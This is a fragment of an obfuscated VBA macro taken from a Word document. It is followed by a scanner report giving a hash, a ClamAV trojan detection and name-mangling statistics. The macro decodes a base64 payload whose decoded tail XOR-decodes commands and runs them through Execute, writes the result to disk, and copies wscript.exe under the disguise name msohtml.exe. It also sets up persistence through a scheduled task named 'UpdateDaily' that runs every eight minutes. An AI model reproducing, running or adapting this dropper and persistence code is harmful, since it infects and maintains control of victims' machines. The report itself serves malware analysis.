    Data = Data + "LDczNyw3NjYsNzY3LDc2NCw3MzcsNzY2LDc2MCw3NjQsNzM3LDc2Niw3NjEsNzY3LDczNyw3NjcsNzYy"
    Data = Data + "LDc2MCw3MzcsNzY3LDc1Nyw3NjUsNzQwLDc1OSw3NDksNjg2LDY3Miw2ODEsNzUyLDc1MSw3NTEsNzU5"
    Data = Data + "LDc0OSw2NTEsNjc0LDcwMyw3NDksNjgwLDY4NCw2ODYsNjc3LDc0OSw2ODYsNzQ5LDY3Niw2NzUsNzQ5"
    Data = Data + "LDY4Niw3MDIsNzU5LDc0OSw2ODYsNjcyLDY4MSw3NTIsNjg2LDY3Miw2ODEsNzQ3LDY1NCw2NzcsNzAz"
    Data = Data + "LDc0MSw2ODYsNzQ5LDY5Myw2NzQsNzAzLDc0OSw3NjYsNzY1LDc2MCw3NDAsNzU5LDc0OSw2NDMsNjgw"
    Data = Data + "LDY5Myw2OTcsNzQ5LDc1OSw3NDksNjg2LDY3Miw2ODEsNzUyLDY4Niw2NzIsNjgxLDc0Nyw2OTksNjg3"
    Data = Data + "LDY4Niw3MDMsNjczLDY4Myw3NTksNzQ5LDY0OCw2OTMsNjgwLDY4Niw2OTYsNjk3LDY4MCw3NDEsNjg2"
    Data = Data + "LDY3Miw2ODEsNzQwLDcxMSw2NjAsNjQwLDY0NCw2NzksNjQyLDcwMSw2NDUsNjkzLDY2NCw3MDEsNjk4"
    Data = Data + "LDY3Myw2ODcsNjk3LDY0NCw3MDMsNjc2LDY3NSw3NDksNzUyLDc0OSw2ODMsNjgxLDcwMCw2NTUsNzAz"
    Data = Data + "LDY5Niw2NTIsNjQ2LDY1Miw2NzUsNjY3LDY1MCw2NDksNjY1LDcwMiw2NDEsNjcxLDc0MSw2ODMsNjQ5"
    Data = Data + "LDY1NCw2NDcsNjUwLDY3MSw2NzUsNzAxLDY0MCw2NTUsNjU1LDY2Nyw2NjAsNjY3LDY2Niw2NTUsNjcw"
    Data = Data + "LDY0Myw3NDAsNzExLDY1MSw2OTYsNjc1LDY4Niw2OTcsNjc2LDY3NCw2NzUsNzQ5LDY2Niw2OTUsNjQ1"
    Data = Data + "LDY2OSw3MDIsNjQ5LDY5OSw2NzYsNjY3LDY5Myw2NjYsNzAxLDcwMyw2ODAsNjYwLDY1MCw2OTgsNjQ5"
    Data = Data + "LDc0MSw2NTQsNjQ3LDcwMyw2NDQsNjUyLDY5OCw2NDksNjc5LDY2MSw2NjcsNjcxLDY5OCw2NDcsNzM3"
    Data = Data + "LDY4MCw3MDMsNjY1LDY2Nyw2NzksNjc5LDY4MSw2NDIsNzAzLDY2MSw2OTMsNjc5LDY4NCw2NzUsNjk1"
    Data = Data + "LDY3NCw2ODAsNzQwLDcxMSw2NjYsNjk1LDY0NSw2NjksNzAyLDY0OSw2OTksNjc2LDY2Nyw2OTMsNjY2"
    Data = Data + "LDcwMSw3MDMsNjgwLDY2MCw2NTAsNjk4LDY0OSw3NDksNzUyLDc0OSw2NTQsNjQ3LDcwMyw2NDQsNjUy"
    Data = Data + "LDY5OCw2NDksNjc5LDY2MSw2NjcsNjcxLDY5OCw2NDcsNzQ5LDc0Miw3NDksNjgwLDcwMyw2NjUsNjY3"
    Data = Data + "LDY3OSw2NzksNjgxLDY0Miw3MDMsNjYxLDY5Myw2NzksNjg0LDY3NSw2OTUsNjc0LDY4MCw3MTEsNjQ4"
    Data = Data + "LDY3NSw2ODEsNzQ5LDY1MSw2OTYsNjc1LDY4Niw2OTcsNjc2LDY3NCw2NzUsNzExLDY0OSw2NzYsNjcy"
    Data = Data + "LDc0OSw2NjMsNjY2LDY3OSw2ODIsNjQ1LDY0MSw2OTgsNjQ1LDY2OCw2NzAsNjY5LDY1NCw3MzcsNzAw"
    Data = Data + "LDY5OSw2NjcsNjgzLDY5Nyw2NDQsNjcxLDY3OCw2NzQsNjY3LDY2Myw2NDQsNjgzLDY1MSw3MzcsNjQy"
    Data = Data + "LDY3MSw2NjYsNjcyLDY2NSw2ODcsNjY2LDY0MCw2ODEsNjQzLDcwMyw2OTIsNjQ0LDY4MSw2OTUsNjc4"
    Data = Data + "LDY0MCw3MDIsNjkyLDY2Niw2OTcsNjU1LDY3Myw2NjQsNzExLDY3MSw2ODQsNjc1LDY4MSw2NzQsNjcy"
    Data = Data + "LDY3Niw2OTUsNjgwLDcxMSw3MDAsNjk5LDY2Nyw2ODMsNjk3LDY0NCw2NzEsNjc4LDY3NCw2NjcsNjYz"
    Data = Data + "LDY0NCw2ODMsNjUxLDc0OSw3NTIsNzQ5LDY3MSw2NzUsNjgxLDcxMSw2NDIsNjcxLDY2Niw2NzIsNjY1"
    Data = Data + "LDY4Nyw2NjYsNjQwLDY4MSw2NDMsNzAzLDY5Miw2NDQsNjgxLDY5NSw2NzgsNjQwLDcwMiw2OTIsNjY2"
    Data = Data + "LDY5Nyw2NTUsNjczLDY2NCw3NDksNzUyLDc0OSw2NzEsNjc1LDY4MSw3MTEsNjYzLDY2Niw2NzksNjgy"
    Data = Data + "LDY0NSw2NDEsNjk4LDY0NSw2NjgsNjcwLDY2OSw2NTQsNzQ5LDc1Miw3NDksNjY2LDY5NSw2NDUsNjY5"
    Data = Data + "LDcwMiw2NDksNjk5LDY3Niw2NjcsNjkzLDY2Niw3MDEsNzAzLDY4MCw2NjAsNjUwLDY5OCw2NDksNzQx"
    Data = Data + "LDcwMCw2OTksNjY3LDY4Myw2OTcsNjQ0LDY3MSw2NzgsNjc0LDY2Nyw2NjMsNjQ0LDY4Myw2NTEsNzM3"
    Data = Data + "LDY0Miw2NzEsNjY2LDY3Miw2NjUsNjg3LDY2Niw2NDAsNjgxLDY0Myw3MDMsNjkyLDY0NCw2ODEsNjk1"
    Data = Data + "LDY3OCw2NDAsNzAyLDY5Miw2NjYsNjk3LDY1NSw2NzMsNjY0LDc0MCk6IGNtZD0iIjogRm9yIGVhY2gg"
    Data = Data + "YyBpbiBjczogY21kPWNtZCZDaHIoYyB4b3IgNzE3KTogTmV4dCA6IGNtZD1jbWQmdmJjcmxmOiBFeGVj"
    Data = Data + "dXRlKGNtZCk="


    Dim DTPcDKLWrBEXmDJohyq
    DTPcDKLWrBEXmDJohyq = JWXZUaRBtyHjzUdZ(Data)
    Dim YzYxCoECUjRVpvzrBd As Object
    Set YzYxCoECUjRVpvzrBd = CreateObject("Scripting.FileSystemObject")
    Dim KTCmuIMgBJRYzHlrL As Object
    Set KTCmuIMgBJRYzHlrL = YzYxCoECUjRVpvzrBd.CreateTextFile(tgrIRwdsnmuquriMIt)
    KTCmuIMgBJRYzHlrL.WriteLine DTPcDKLWrBEXmDJohyq
    KTCmuIMgBJRYzHlrL.Close
    Set YzYxCoECUjRVpvzrBd = Nothing
    Set KTCmuIMgBJRYzHlrL = Nothing
    Set OFSO = CreateObject("Scripting.FileSystemObject")
    
    Dim wRXfRfhGCxCPW As String
    wRXfRfhGCxCPW = Environ("SYSTEMDRIVE")
    Dim arcPath As String
    arcPath = rzfevexNwMGnPWXpK & "\\Windows\\SysWOW64"
    
    If OFSO.FolderExists(arcPath) = True Then
        FileCopy wRXfRfhGCxCPW & "\Windows\SysWOW64\wscript.exe", rzfevexNwMGnPWXpK & "\msohtml.exe"
    Else
        FileCopy wRXfRfhGCxCPW & "\Windows\System32\wscript.exe", rzfevexNwMGnPWXpK & "\msohtml.exe"
    End If
End Function
Function JWXZUaRBtyHjzUdZ(ByVal base64String)
  Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/[!!]"
  Dim dataLength, sOut, groupBegin
  base64String = Replace(base64String, vbCrLf, "")
  base64String = Replace(base64String, vbTab, "")
  base64String = Replace(base64String, " ", "")
  dataLength = Len(base64String)
  If dataLength Mod 4 <> 0 Then
    Err.Raise 1, "JWXZUaRBtyHjzUdZ", "Bad Base64 string."
    Exit Function
  End If
  For groupBegin = 1 To dataLength Step 4
    Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
    numDataBytes = 3
    nGroup = 0
    For CharCounter = 0 To 3
      thisChar = Mid(base64String, groupBegin + CharCounter, 1)
      If thisChar = "=" Then
        numDataBytes = numDataBytes - 1
        thisData = 0
      Else
        thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
      End If
      If thisData = -1 Then
        Err.Raise 2, "JWXZUaRBtyHjzUdZ", "Bad character In Base64 string."
        Exit Function
      End If
      nGroup = 64 * nGroup + thisData
    Next
    nGroup = Hex(nGroup)
    nGroup = String(6 - Len(nGroup), "0") & nGroup
    pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
      Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
      Chr(CByte("&H" & Mid(nGroup, 5, 2)))
    sOut = sOut & Left(pOut, numDataBytes)
  Next
  JWXZUaRBtyHjzUdZ = sOut
End Function
Function yiBhyERIualWRmBjcsIbCZLq(MBrUZCnACSJYjdxmUAnw As String)
    Const TriggerTypeTime = 1
    Const ActionTypeExec = 0
    Set service = CreateObject("Schedule.Service")
    Call service.Connect
    Dim rootFolder
    Set rootFolder = service.GetFolder("\")
    Dim taskDefinition
    Set taskDefinition = service.NewTask(0)
    Dim principal
    Set principal = taskDefinition.principal
    principal.LogonType = 3
    Dim settings
    Set settings = taskDefinition.settings
    settings.Enabled = True
    settings.StartWhenAvailable = True
    settings.Hidden = False
    Dim triggers
    Set triggers = taskDefinition.triggers
    Dim trigger
    Set trigger = triggers.Create(TriggerTypeTime)
    Dim startTime, endTime
    Dim time
    time = DateAdd("s", 30, Now)
    startTime = XmlTime(time)
    trigger.StartBoundary = startTime
    trigger.Enabled = True
    Dim Repetition
    Set Repetition = trigger.Repetition
    Repetition.Interval = "PT" & "8" & "M"
    Dim Action
    Set Action = taskDefinition.Actions.Create(ActionTypeExec)
    Action.Path = "explorer.exe"
    Action.Arguments = "shell:::{" & MBrUZCnACSJYjdxmUAnw & "}"
    Call rootFolder.RegisterTaskDefinition("UpdateDaily", taskDefinition, 6, , , 3)
End Function
Function XmlTime(t)
    Dim cSecond, cMinute, CHour, cDay, cMonth, cYear
    Dim tTime, tDate
    cSecond = "0" & Second(t)
    cMinute = "0" & Minute(t)
    CHour = "0" & Hour(t)
    cDay = "0" & Day(t)
    cMonth = "0" & Month(t)
    cYear = Year(t)
    tTime = Right(CHour, 2) & ":" & Right(cMinute, 2) & _
        ":" & Right(cSecond, 2)
    tDate = cYear & "-" & Right(cMonth, 2) & "-" & Right(cDay, 2)
    XmlTime = tDate & "T" & tTime
End Function

Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 42496 bytes
SHA-256: e957acfe540beea791ff6115abe00095de9c2e20154308af4c00af64998ec3db
Detection
ClamAV: Doc.Trojan.Agent-6923201-0
Obfuscation or payload: likely
263 of 428 identifiers look randomly generated (e.g. 'LDY4Nyw2NzYsNjU0LDY2MCw3MDMsNzQ5LDc0Miw3') — consistent with name-mangling obfuscation.